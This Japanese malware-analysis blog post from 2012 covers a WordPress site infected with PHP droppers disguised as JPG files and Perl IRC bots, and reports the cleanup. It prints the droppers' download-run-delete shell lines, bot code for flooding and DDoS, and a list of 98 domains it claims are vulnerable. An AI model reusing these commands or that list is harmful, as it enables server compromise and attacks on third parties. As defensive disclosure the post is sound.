日曜日, 2月 26, 2012

#OCJP-020: WordPressサービスの脆弱性があるサイト(gutchi.jp/210.157.5.15)にIRC経由PHPとPerlマルウェアに感染されました! 【対応済み】


今回の発見に付いて、マルウェア感染仕組みから説明をさせて頂きます。
本件の感染仕組みは日本に何回も見ましたので、今後同じ問題が起きないように詳しく書きます、宜しくお願いします。

証拠からで行くと、さっそくですが↓

■下記のホスト↓

gutchi.jp / 210.157.5.15

■下記のURL↓

hxxp://gutchi.jp/wp//wp-content/themes/delicate/cache/pani1.jpg hxxp://gutchi.jp/wp//wp-content/themes/delicate/cache/pani2.jpg hxxp://gutchi.jp/wp//wp-content/themes/delicate/cache/unix.txt hxxp://gutchi.jp/wp//wp-content/themes/delicate/cache/nyamuk.txt

■ダウンロードの証拠とスナップショット証拠↓

--20:54:57-- hxxp://gutchi.jp/wp//wp-content/themes/delicate/cache/pani2.jpg => `pani2.jpg' Resolving gutchi.jp... 210.157.5.15 Connecting to gutchi.jp|210.157.5.15|:80... connected. HTTP request sent, awaiting response... 200 OK Length: 2,771 (2.7K) [image/jpeg] 100%[====================================>] 2,771 --.--K/s 20:54:57 (78.83 MB/s) - `pani2.jpg' saved [2771/2771] --20:55:18-- hxxp://gutchi.jp/wp//wp-content/themes/delicate/cache/pani1.jpg => `pani1.jpg' Resolving gutchi.jp... 210.157.5.15 Connecting to gutchi.jp|210.157.5.15|:80... connected. HTTP request sent, awaiting response... 200 OK Length: 2,859 (2.8K) [image/jpeg] 100%[====================================>] 2,859 --.--K/s 20:55:18 (1.60 MB/s) - `pani1.jpg' saved [2859/2859] --20:55:27-- hxxp://gutchi.jp/wp//wp-content/themes/delicate/cache/unix.txt => `unix.txt' Resolving gutchi.jp... 210.157.5.15 Connecting to gutchi.jp|210.157.5.15|:80... connected. HTTP request sent, awaiting response... 200 OK Length: 59,589 (58K) [text/plain] 100%[====================================>] 59,589 --.--K/s 20:55:28 (868.37 KB/s) - `unix.txt' saved [59589/59589] --20:55:34-- hxxp://gutchi.jp/wp//wp-content/themes/delicate/cache/nyamuk.txt => `nyamuk.txt' Resolving gutchi.jp... 210.157.5.15 Connecting to gutchi.jp|210.157.5.15|:80... connected. HTTP request sent, awaiting response... 200 OK Length: 53,447 (52K) [text/plain] 100%[====================================>] 53,447 --.--K/s 20:55:35 (442.05 KB/s) - `nyamuk.txt' saved [53447/53447]

■ブラウザから安全で直ぐに確認が出来ます↓ ■本件のファイルは感染されたサーバに保存されていて実行権限が持っています↓ ■下記のマルウェアを発見しました↓(スキャン結果とマルウェア説明)

File name: pani1.jpg File size: 2.8 KB ( 2859 bytes ) MD5: fe0b467c8c2601dbb344d741e56f4baf File type: looks: JPG File, actual: PHP Script DetectionRatio: 1 / 43 Analysis Date: 2012-02-25 15:22:30 Analysis Result: [CLICK] File name: pani2.jpg File size: 2.7 KB ( 2771 bytes ) MD5: 849927dae774a1909ae6e27c1c3a8869 File type: looks: JPG File, actual: PHP Script DetectionRatio: 1 / 42 Analysis Date: 2012-02-25 15:23:03 UTC Analysis Result: [CLICK] ↑上記は下記のマルウェアです↓ アファイル  :「pani1.jpg」「pani2.jpg」 マルウェア種類: トロイ・UNIX経由のPHPドロッパーとバックドア マルウェア名 : PHP/Trojan Dropper/Downloader/Copier マルウェア機能: リモートから実行される事、ダウンロードされたマルウェアを実行されます 説明     : 本マルウェアは脆弱でインジェクトされたニセJPGファイル、 HTTPでリモート実行実行されたらマルウェアファイルをダウンロードされて、 ダウンロードされたマルウェアをPerlで実行し削除されました。 ファイルの形は:

上記のトロイを実行されたら下記のマルウェアがダウンロードされます↓

File name: nyamuk.txt File size: 52.2 KB ( 53447 bytes ) MD5: 03465ffba9ff05baab7ba3627b12c5d7 File type: looks: Text File, actual: Perl Script Detection ratio: 12 / 42 Analysis date: 2012-02-25 16:06:19 UTC Analysis Result: [CLICK] ↑マルウェアの種類は↓ アファイル  :「nyamuk.txt」 マルウェア種類: トロイ・Perl/IRC-BOT・攻撃ツール + バックドア マルウェア名 : Perl/Trojan.IRC-BOT IRC-FLooder/Backdoor マルウェア機能: リモート実行あれる事、IRCサーバへ攻撃する事 説明     : 本マルウェアを実行されたらIRCチャンネルにFloodメッセージ攻撃を送信されます File name: unix.txt File size: 58.2 KB ( 59589 bytes ) MD5: 6ccd2c5fb978ac8065fcf550cd306c0f File type: looks: Text File, actual: Perl Script Detection ratio: 26 / 43 Analysis date: 2012-02-25 16:07:22 UTC Analysis Result: [CLICK] アファイル  :「unix.txt」 マルウェア種類: トロイ・Perl/IRC-BOT・攻撃ツール + バックドア マルウェア名 : Perl/Trojan.IRC-BOT IRC-FLooder/Backdoor/Shell マルウェア機能: ・リモートから実行される事、 ・IRCサーバ経由ネットワーク攻撃機能が持っています 説明     : 本マルウェアを実行されたらIRC経由でDDoS攻撃/PortScan/感染動き バックドア機能はIRCポートとメール送信機能 「unix.txt」と「nyamuk.txt」ファイルの形は:

■マルウェアの感染仕組み↓

感染されたサーバの原因は下記のWordpress脆弱性があるはず(どっちか)↓
CVE-2012-1205 Relocate Upload plugin flaw : PHP remote file inclusion CVE-2012-1011 AllWebMenus plugin flaw : HTTP_REFERER value injection CVE-2012-1010 AllWebMenus plugin flaw : Execute arbitrary code CVE-2011-5051 WP Symposium plugin : XSS insecure PHP input handle CVE-2011-3841 WP Symposium plugin : XSS insecure PHP input handle CVE-2011-3129 On hosts with dangerous security setting flaw
※本問題に影響されたらリモートからJPGファイルがインジェクトされます。  WordpressにあるPHPのインプットハンドルのバグを使われてXSSで攻撃されただろうと。  詳しくはサーバにある2月7日のアクセスログに攻撃元の情報が残っているはずです。 それで、感染されたサーバがリモートから実行される問題があります、 原因はWordpressのthemeリモート実行脆弱性ですね、下記のどっちか↓
CVE-2011-3863, CVE-2011-3862, CVE-2011-3861 CVE-2011-3860, CVE-2011-3858, CVE-2011-3857 CVE-2011-3856, CVE-2011-3855, CVE-2011-3854 CVE-2011-3853, CVE-2011-3852, CVE-2011-3851 CVE-2011-3850
※上記の問題は全てWordpressのthemeダイレクトリー権限の脆弱性ですね。 影響されたらリモートからサーバのthemeパスにのコマンドを実行される事が出来ます。 本来はwget/curl/lynx/rmのコマンドがリモートから実行されたそうです、証拠は nyamuk.txtとunix,txtが保存されましたね。  詳しくはサーバにある2月7日のアクセスログを見て下さい

■マルウェアの説明↓

感染仕組みのイメージはこんな感じのイラストレーション↓ 本マルウェアの感染仕組みですが、私が見た限りIRC-BOTのインストールツールが使われているそうです。 ツールの仕組みは大体こんな感じですね↓ まずはWordpressの脆弱性を確認してからそのツールが実行されるかと思われます。 本件の感染されたサーバを見たらWordpressとWPのthemeがインストールされてます↓ ↑これが普通にwebcrawlingで分かりますね。 それでWordpressのバーションを確認したら下記脆弱情報を使って画像ファイルをアップロードされます↓ ↑詳しい脆弱性情報を確認したいなら上記のCVEをクリックして下さい。 一回画像ファイルアップロード脆弱性があると確認されたら、PHPやWPがファイル名しか確認しないので、 ニセ画像ファイルの名前でテキストファイルもアップロードされます。 それでアップロードした時にちゃんと実行権限を設定されたらマルウェアがリモートから実行される状況になる↓ そして他のマルウェアファイルをアップロードされます。とのツール仕組みです。 それでこの4つのファイルは何の為にあるかと、説明します。 pani1は他のサーバに感染させるようなマルウェアです。 ロジックは下記のようにになります、このままのマルウェアPHPコードです↓
@passthru('cd /tmp;wget http://xxxx/nyamuk.txt;perl nyamuk.txt;rm -rf ips1.txt'); @passthru('cd /tmp;curl -O http://xxxx/nyamuk.txt;perl nyamuk.txt;rm -rf ips1.txt'); @passthru('cd /tmp;lwp-download http://xxxx/nyamuk.txt;perl nyamuk.txt;rm -rf ips1.txt'); @passthru('cd /tmp;lynx -source http://xxxx/nyamuk.txt;perl nyamuk.txt;rm -rf ips1.txt'); @passthru('cd /tmp;fetch http://xxxx/nyamuk.txt;perl nyamuk.txt;rm -rf ips1.txt'); @passthru('cd /tmp;GET http://xxxx/nyamuk.txt;perl nyamuk.txt;rm -rf ips1.txt'); @passthru('cd /var/tmp;wget http://xxxx/nyamuk.txt;perl nyamuk.txt;rm -rf ips1.txt'); @passthru('cd /var/tmp;curl -O http://xxxx/nyamuk.txt;perl nyamuk.txt;rm -rf ips1.txt'); @passthru('cd /var/tmp;lwp-download http://xxxx/nyamuk.txt;perl nyamuk.txt;rm -rf ips1.txt'); @passthru('cd /var/tmp;fetch http://xxxx/nyamuk.txt;perl nyamuk.txt;rm -rf ips1.txt'); @passthru('cd /var/tmp;GET http://xxxx/nyamuk.txt;perl nyamuk.txt;rm -rf ips1.txt'); @system('cd /tmp;wget http://xxxx/nyamuk.txt;perl nyamuk.txt;rm -rf ips1.txt'); @system('cd /tmp;curl -O http://xxxx/nyamuk.txt;perl nyamuk.txt;rm -rf ips1.txt'); @system('cd /tmp;lwp-download http://xxxx/nyamuk.txt;perl nyamuk.txt;rm -rf ips1.txt'); @system('cd /tmp;lynx -source http://xxxx/nyamuk.txt;perl nyamuk.txt;rm -rf ips1.txt'); @system('cd /tmp;fetch http://xxxx/nyamuk.txt;perl nyamuk.txt;rm -rf ips1.txt'); @system('cd /tmp;GET http://xxxx/nyamuk.txt;perl nyamuk.txt;rm -rf ips1.txt'); @system('cd /var/tmp;wget http://xxxx/nyamuk.txt;perl nyamuk.txt;rm -rf ips1.txt'); @system('cd /var/tmp;curl -O http://xxxx/nyamuk.txt;perl nyamuk.txt;rm -rf ips1.txt'); @system('cd /var/tmp;lwp-download http://xxxx/nyamuk.txt;perl nyamuk.txt;rm -rf ips1.txt'); @system('cd /var/tmp;fetch http://xxxx/nyamuk.txt;perl nyamuk.txt;rm -rf ips1.txt'); @system('cd /var/tmp;GET http://xxxx/nyamuk.txt;perl nyamuk.txt;rm -rf ips1.txt');
↑見たようにnyamuk.txtのマルウェアを/tmpにダウンロードして、システムにコピーするです。 さらに/tmpに保存されたnyamuk.txtを削除されますね。 づアンロードの為に色んなUNIXコマンドを使われてますねwget, curl,lwp-download,lynx fetch,GETとか 詰り、PHPリモート実行脆弱性があるマシンで本件マルウェア感染されたマシンのpani1.jpgを実行したら、 nyamuk.txtのPerlマルウェアがダウンロードされるとの目的です。 同じ様にpani2ファイルは下記のロジックです↓
@passthru('cd /tmp;wget xxxx/unix.txt;perl unix.txt;rm -rf unix.txt*'); @passthru('cd /tmp;curl -O xxxx/unix.txt;perl unix.txt;rm -rf unix.txt*'); @passthru('cd /tmp;lwp-download xxxx/unix.txt;perl unix.txt;rm -rf unix.txt*'); @passthru('cd /tmp;lynx -source xxxx/unix.txt;perl unix.txt;rm -rf unix.txt*'); @passthru('cd /tmp;fetch xxxx/unix.txt;perl unix.txt;rm -rf unix.txt*'); @passthru('cd /tmp;GET xxxx/unix.txt;perl unix.txt;rm -rf unix.txt*'); @passthru('cd /var/tmp;wget xxxx/unix.txt;perl unix.txt;rm -rf unix.txt*'); @passthru('cd /var/tmp;curl -O xxxx/unix.txt;perl unix.txt;rm -rf unix.txt*'); @passthru('cd /var/tmp;lwp-download xxxx/unix.txt;perl unix.txt;rm -rf unix.txt*'); @passthru('cd /var/tmp;fetch xxxx/unix.txt;perl unix.txt;rm -rf unix.txt*'); @passthru('cd /var/tmp;GET xxxx/unix.txt;perl unix.txt;rm -rf unix.txt*'); @system('cd /tmp;wget xxxx/unix.txt;perl unix.txt;rm -rf unix.txt*'); @system('cd /tmp;curl -O xxxx/unix.txt;perl unix.txt;rm -rf unix.txt*'); @system('cd /tmp;lwp-download xxxx/unix.txt;perl unix.txt;rm -rf unix.txt*'); @system('cd /tmp;lynx -source xxxx/unix.txt;perl unix.txt;rm -rf unix.txt*'); @system('cd /tmp;fetch xxxx/unix.txt;perl unix.txt;rm -rf unix.txt*'); @system('cd /tmp;GET xxxx/unix.txt;perl unix.txt;rm -rf unix.txt*'); @system('cd /var/tmp;wget xxxx/unix.txt;perl unix.txt;rm -rf unix.txt*'); @system('cd /var/tmp;curl -O xxxx/unix.txt;perl unix.txt;rm -rf unix.txt*'); @system('cd /var/tmp;lwp-download xxxx/unix.txt;perl unix.txt;rm -rf unix.txt*'); @system('cd /var/tmp;fetch xxxx/unix.txt;perl unix.txt;rm -rf unix.txt*'); @system('cd /var/tmp;GET xxxx/unix.txt;perl unix.txt;rm -rf unix.txt*');
↑pani2はunix.txtのPerlマルウェアを感染させるようなPHPマルウェアです。 pani1とpani2は何故か実行が可能になったかと下記のWordpressのthemeの影響があります↓ nyamuk.txtマルウェア説明↓
次はnyamuk.txtはどんなマルウェアでしょうか?簡単な説明をさせて頂きます… ヘッタには下記のスナップショットコードです↓
#!/usr/bin/perl # PENGATURAN ########################################## my $server = "multiplay.uk.quakenet.org"; my $port = "6667"; my $channel = "#marxone"; ↑これだけ見たらPerl経由IRC BOTです、が…
インターフェースの情報をゲット↓
my @ips1 =qx(/sbin/ifconfig |grep \"inet addr\:\" \|awk \-F \' \' \'\{\print \$2\} \' \| cut \-c6\-); my @ips2 =qx(/sbin/ifconfig \-a |grep \"inet end\.\:\" \|awk \-F \' \' \'\{\print \$3\} \'); my @fbsd =qx(/sbin/ifconfig \|grep \"inet\" \|awk \-F \' \' \'\{\print \$2\} \' \| cut \-c1\-); @ips = (@ips1, @ips2, @fbsd);
base64暗号されたIRCユーザを発見↓
$string1 = "ZGFya2x5"; ←"darkly" $string2 = "Y0t6"; ←"cKz" $string3 = "cGFuYQ=="; ←"pana" $string4 = "RnVzaW9u"; ←"Fusion" $string5 = "SXowbg=="; ←"Iz0n"
攻撃メニュー↓
print $sock "PRIVMSG ".$owner." : ================================\n"; print $sock "PRIVMSG ".$owner." : + LinkIRC\n"; print $sock "PRIVMSG ".$owner." : + pani\n"; print $sock "PRIVMSG ".$owner." : + LinkIRC\n"; print $sock "PRIVMSG ".$owner." : ================================\n"; print $sock "PRIVMSG ".$owner." : - perintah:\n"; print $sock "PRIVMSG ".$owner." : !tembak nick pesan (msgflood)\n";
Flood/DDoSコマンド(Dccなど)↓
if(/^\:$owner!.*\@.*PRIVMSG.*:!dccflood(.*)/){ for (1 .. 10) { print $sock "PRIVMSG ".$mescalina." :\001DCC CHAT chat 1121485131 1024\001\n"; if(/^\:$owner!.*\@.*PRIVMSG.*:!notis (.*)/){ my $musuh = $1; print $sock "NOTICE ".$musuh." : MAMMMMMMMMMMPPPPPPPUUUUUUUUUUUSSSSSSSSSSSSS LLLLLLLLLLLOOOOOOOOOO FUCK MOTHER FUCKER\n";
では、nyamuk.txtはIRC Floof/DDoS攻撃ツールのマルウェアですね。 コードのベースはスペイン語コメントが沢山書いてありますが、 インドネシア語のメッセージが上書きされています。 本マルウェアに感染されたサーバに2月7日のログで検索するとインドネシアのASN/IPが出たらば、 それは犯人ですよ。
unix.txtのマルウェア説明↓
このマルウェアは完全にIRCボット+攻撃ツールですね。 下記はいくつコードのスナップショット... ヘッターはこんな感じで、見た目はPerlのIRC-BOTです↓
####################################################### ## Perl Shell at mIRC Control ## ## By TuX_Sh4D0W ## ## Released : 11 November 2008 ## ## --------------------------------------------------## ##.---..-..-..-.,-..-..-..-. .---..---..---..----. ## ##'| |'| || || . < | || || |__ | |- \ \ '| |'| || | ## ## '-' '----''-''-''----''----''---''---' '-' '----' ## ##-------------------------------------------------- ## ####################################################### #!/usr/bin/perl ###################### my $processo = '/usr/sbin/r00t'; my $linas_max='8';
UNIXサーバIRCシステムを狙ってますね↓
$IRC_cur_socket = $IRC_socket; $IRC_socket->autoflush(1); $sel_cliente->add($IRC_socket); $irc_servers{$IRC_cur_socket}{'host'} = "$servidor_con"; $irc_servers{$IRC_cur_socket}{'porta'} = "$porta_con"; $irc_servers{$IRC_cur_socket}{'nick'} = $meunick; $irc_servers{$IRC_cur_socket}{'meuip'} = $IRC_socket->sockhost;
こちらもインドネシアのサインを発見(^^
################################## # DONATE US # ################################## # http://www.indonesiancoder.com # #########################
攻撃メニュー↓
sendraw($IRC_cur_socket, "PRIVMSG $printl : ( 4+ Help 4+ ) !hack 7@ ddos"); sendraw($IRC_cur_socket, "PRIVMSG $printl : ( 4+ Help 4+ ) !hack 7@ scanscan"); sendraw($IRC_cur_socket, "PRIVMSG $printl : ( 4+ Help 4+ ) !hack 7@ backconnect"); sendraw($IRC_cur_socket, "PRIVMSG $printl : ( 4+ Help 4+ ) !hack 7@ shell"); sendraw($IRC_cur_socket, "PRIVMSG $printl : ( 4+ Help 4+ ) !hack 7@ portscanner");
専用DDoS攻撃メニュー↓
"PRIVMSG $printl : ( 4+ Help 4+ ) There are 3 DDossers in this bot"); "PRIVMSG $printl : ( 4+ Help 4+ ) UDPFlood, HTTPFlood and TCPFlood"); "PRIVMSG $printl : ( 4+ Help 4+ ) !hack 7@ udpflood
その他のハッキング機能↓
!hack 7@ portscan "); !hack 7@ nmap "); !hack 7@ back "); !hack cd tmp 12 for example"); !hack 7@ udpflood

■感染されたサービスの情報(連絡先など)

[Domain Name] GUTCHI.JP [Registrant] BET.Inc [Name Server] dns01.gmoserver.jp [Name Server] dns02.gmoserver.jp [Created on] 2007/06/20 [Expires on] 2012/06/30 [Status] Active [Last Updated] 2012/01/25 18:38:08 (JST) Contact Information: [Name] BET, Inc. [Email] info@bet.co.jp [Web Page] [Postal code] 530-0012 [Postal Address] Osaka 1-14-8 shibata,kita-ku,osaka-city,Osaka Umedakita Place 12F [Phone] 06-6292-8811 [Fax] 06-6292-8812 a. [Network Number] 210.157.0.0/20 b. [Network Name] INTERQ g. [Organization] Global Media Online inc. m. [Administrative Contact] TW184JP n. [Technical Contact] TW184JP p. [Nameserver] ***LAME***_dns.interq.or.jp_2011-12-01 p. [Nameserver] ***LAME***_dns1.interq.or.jp_2011-12-01 [Remarks] The nameserver marked as ***LAME*** is not [Remarks] properly configured. [Assigned Date] 1997/05/28 [Last Update] 2008/07/29 14:05:05(JST) a. [JPNICハンドル] TW184JP b. [氏名] 割田 太郎 c. [Last, First] Warita, Taro d. [電子メイル] warita@gmo.jp f. [組織名] GMOインターネット株式会社 g. [Organization] GMO Internet,Inc k. [部署] システム本部ネットワークチーム l. [Division] System Department,Network Team m. [肩書] リーダ n. [Title] Leader o. [電話番号] 03-5456-2555 p. [FAX番号] 03-5456-2687 y. [通知アドレス] network-team@gmo.jp [最終更新] 2007/05/28 11:32:32(JST) db-staff@nic.ad.jp

■インターネットルーティング図 ASNルート↓ IP対ドメイン情報↓ ↑ここで見たら、同じホスティングサーバのIPに色んなWordpressサービスのお客様が居ます。 他のユーザにも同じ脆弱性が持っているので(確認しました!)、同じマルウェアに感染される可能性が高いです。 本件にはBET社とGMO社にご注意をお願いしたいと思っております。 上記の情報を洗い出したら恐らく98件の日本のドメインには同じ脆弱性があるかと分かりました↓

11111.jp 1571.jp 21j.com 99999.jp a-llure.cx a-takane.biz abe-d.com active-dream.jp afia.jp anom.jp aoruk.com at-china.jp beatec.net boogiewoogiecafe.com brideslife.com clubrinea.com coral-islands.com cosmopk.com csk.vc ctic.jp cues-ad.co.jp dom.com driver.novac.co.jp drnet.jp e-works.vc earth-wind.net elan.co.jp f-toshi.com faceo.co.jp gongwell.com gr0.net hpv.jp hyogo-cals.org i-plus.co.jp ida-web.co.jp ihj.jp incuvalue.com izumimachi.net jardinsdesfleurs.com jenne-vbm.com jhowardtrading.com jpdgafukuoka.com kabu.cc kamojiru.com karhosting.com kashikin.info katuyama.com keizuconcord.com krei-bel.com ku-kaisers.com kumapooh.jp kyoto-town.tv mediac.com na-arts.jp nextlayer.jp nr-a.com onkodo.com oyadokayu.com p-cube.jp p-maps.co.jp picnet.jp prmc.co.jp saitogakkikoubou.com saiwai-law.com sayadoll.com seniorcosmos.co.jp shimagaku-h.ed.jp shinowazuri.com sinhp.jp sophia3.com splendid.jp spyle.com stinx.net tammy-inv.co.jp tansan.co.jp test119.com uekusa-tri.co.jp v-max.co.jp videomanial.co.jp weddingatgreenes.com wise-academy.net wonder9.com www.csk.vc www.elan.co.jp www.katuyama.com www.kazuhide.biz www.keizuconcord.com www.lejeudelassiette.com www.shantiitown.com www.uekusa-tri.co.jp www.videomanial.co.jp www.wise-academy.net wyvern.jp xn--pqqy41ezej.com yahashira.com yatong-textiles.com yuriozaki.com yyadachi.com

■マルウェア削除依頼の連絡を送りました↓ 以上

----
ゼロデイ・ジャパン
http://0day.jp
マルウェア研究所
アドリアン・ヘンドリック
Sponsored by: 株式会社ケイエルジェイテック

1 件のコメント:

  1. 本事件の対応に付いて、終了です。
    GMOさんより早い行動のご協力頂きましてありがとうございました。

    返信削除